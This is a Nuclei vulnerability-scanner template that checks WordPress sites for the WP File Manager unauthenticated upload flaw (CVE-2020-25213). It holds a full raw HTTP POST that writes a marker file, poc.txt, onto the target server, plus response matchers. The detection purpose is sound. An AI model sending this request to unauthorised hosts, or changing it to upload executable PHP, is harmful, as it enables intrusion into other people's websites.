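# Nuclei template: checks whether the WP File Manager connector accepts an
# unauthenticated upload (CVE-2020-25213).
#
# The id uses plain ASCII hyphens so that it matches the CVE identifier in the
# reference URL below.
id: CVE-2020-25213

info:
  name: WP File Manager RCE
  author: foulenzer
  severity: critical
  # The request below is not a passive fingerprint: it writes a file on the
  # scanned host, and the description says so.
  description: The vulnerability allows unauthenticated remote attackers to upload .php files. This template uploads a plain-text marker file (poc.txt) to confirm the unauthenticated upload path; it does not upload or execute PHP.
  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
  tags: cve,cve2020,wordpress,rce

# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
#
# The template does not delete poc.txt. After a positive result, remove the
# file from the plugin's lib/files directory and update the plugin as described
# in the referenced advisory.

requests:
  # One multipart POST to the plugin's connector, sent without any cookie or
  # nonce. Content-Length is hard-coded, so re-check it if the body is edited.
  - raw:
      - |
        POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Length: 608
        Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
        Connection: close

        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="reqid"

        17457a1fe6959
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="cmd"

        upload
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="target"

        l1_Lw
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="mtime[]"

        1576045135
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="upload[]"; filename="poc.txt"
        Content-Type: text/plain

        poc-test
        --------------------------ca81ac1fececda48--

    # All three matchers must hold before a finding is reported.
    matchers-condition: and
    matchers:
      # No "part" is given, so this matches the response body: it must contain
      # both the uploaded file name and the word "added".
      - type: word
        words:
          - poc.txt
          - added
        condition: and

      # The response must declare a JSON content type in its headers.
      - type: word
        words:
          - application/json
        part: header

      # The upload request must be answered with HTTP 200.
      - type: status
        status:
          - 200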